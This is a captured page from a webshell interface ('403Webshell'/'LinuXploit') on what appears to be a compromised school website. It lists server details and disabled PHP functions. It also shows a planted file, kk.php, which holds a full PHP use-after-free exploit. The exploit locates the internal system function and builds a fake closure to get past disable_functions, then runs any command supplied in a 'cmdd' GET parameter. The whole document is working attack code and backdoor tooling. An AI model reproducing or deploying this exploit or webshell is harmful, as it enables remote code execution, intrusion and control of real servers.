403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/domains/technicrayong.ac.th/public_html/assets/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/technic2/domains/technicrayong.ac.th/public_html/assets/css/kk.php
<?php

        class Helper { public $a, $b, $c; }

        class Pwn {
            const LOGGING = false;
            const CHUNK_DATA_SIZE = 0x60;
            const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE;
            const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1;
            const HT_SIZE = 0x118;
            const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1;
            public function __construct($cmd) {
                for($i = 0; $i < 10; $i++) {
                    $groom[] = self::alloc(self::STRING_SIZE);
                    $groom[] = self::alloc(self::HT_STRING_SIZE);
                }
            $concat_str_addr = self::str2ptr($this->heap_leak(), 16);
            $fill = self::alloc(self::STRING_SIZE);
    
            $this->abc = self::alloc(self::STRING_SIZE);
            $abc_addr = $concat_str_addr + self::CHUNK_SIZE;
            self::log("abc @ 0x%x", $abc_addr);
    
            $this->free($abc_addr);
            $this->helper = new Helper;
            if(strlen($this->abc) < 0x1337) {
                self::log("uaf failed");
                return;
            }
    
            $this->helper->a = "leet";
            $this->helper->b = function($x) {};
            $this->helper->c = 0xfeedface;
    
            $helper_handlers = $this->rel_read(0);
            self::log("helper handlers @ 0x%x", $helper_handlers);
    
            $closure_addr = $this->rel_read(0x20);
            self::log("real closure @ 0x%x", $closure_addr);
    
            $closure_ce = $this->read($closure_addr + 0x10);
            self::log("closure class_entry @ 0x%x", $closure_ce);
            
            $basic_funcs = $this->get_basic_funcs($closure_ce);
            self::log("basic_functions @ 0x%x", $basic_funcs);
    
            $zif_system = $this->get_system($basic_funcs);
            self::log("zif_system @ 0x%x", $zif_system);
    
            $fake_closure_off = 0x70;
            for($i = 0; $i < 0x138; $i += 8) {
                $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i));
            }
            $this->rel_write($fake_closure_off + 0x38, 1, 4);
            $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
            $this->rel_write($fake_closure_off + $handler_offset, $zif_system);
    
            $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18;
            self::log("fake closure @ 0x%x", $fake_closure_addr);
    
            $this->rel_write(0x20, $fake_closure_addr);
            ($this->helper->b)($cmd);
    
            $this->rel_write(0x20, $closure_addr);
            unset($this->helper->b);
        }
    
        private function heap_leak() {
            $arr = [[], []];
            set_error_handler(function() use (&$arr, &$buf) {
                $arr = 1;
                $buf = str_repeat("\x00", self::HT_STRING_SIZE);
            });
            $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array"));
            return $buf;
        }
    
        private function free($addr) {
            $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr);
            $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload));
            
            $arr = [[], []];
            set_error_handler(function() use (&$arr, &$buf, &$payload) {
                $arr = 1;
                $buf = str_repeat($payload, 1);
            });
            $arr[1] .= "x";
        }
    
        private function rel_read($offset) {
            return self::str2ptr($this->abc, $offset);
        }
    
        private function rel_write($offset, $value, $n = 8) {
            for ($i = 0; $i < $n; $i++) {
                $this->abc[$offset + $i] = chr($value & 0xff);
                $value >>= 8;
            }
        }
    
        private function read($addr, $n = 8) {
            $this->rel_write(0x10, $addr - 0x10);
            $value = strlen($this->helper->a);
            if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
            return $value;
        }
    
        private function get_system($basic_funcs) {
            $addr = $basic_funcs;
            do {
                $f_entry = $this->read($addr);
                $f_name = $this->read($f_entry, 6);
                if($f_name === 0x6d6574737973) {
                    return $this->read($addr + 8);
                }
                $addr += 0x20;
            } while($f_entry !== 0);
        }
    
        private function get_basic_funcs($addr) {
            while(true) {
                // In rare instances the standard module might lie after the addr we're starting
                // the search from. This will result in a SIGSGV when the search reaches an unmapped page.
                // In that case, changing the direction of the search should fix the crash.
                // $addr += 0x10;
                $addr -= 0x10;
                if($this->read($addr, 4) === 0xA8 &&
                    in_array($this->read($addr + 4, 4),
                        [20180731, 20190902, 20200930, 20210902])) {
                    $module_name_addr = $this->read($addr + 0x20);
                    $module_name = $this->read($module_name_addr);
                    if($module_name === 0x647261646e617473) {
                        self::log("standard module @ 0x%x", $addr);
                        return $this->read($addr + 0x28);
                    }
                }
            }
        }
    
        private function log($format, $val = "") {
            if(self::LOGGING) {
                printf("{$format}\n", $val);
            }
        }
    
        static function alloc($size) {
            return str_shuffle(str_repeat("A", $size));
        }
    
        static function str2ptr($str, $p = 0, $n = 8) {
            $address = 0;
            for($j = $n - 1; $j >= 0; $j--) {
                $address <<= 8;
                $address |= ord($str[$p + $j]);
            }
            return $address;
        }
    }

    if(isset($_GET['cmdd'])){
        $cmdd = ($_GET['cmdd']);
        new Pwn("$cmdd");
    }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit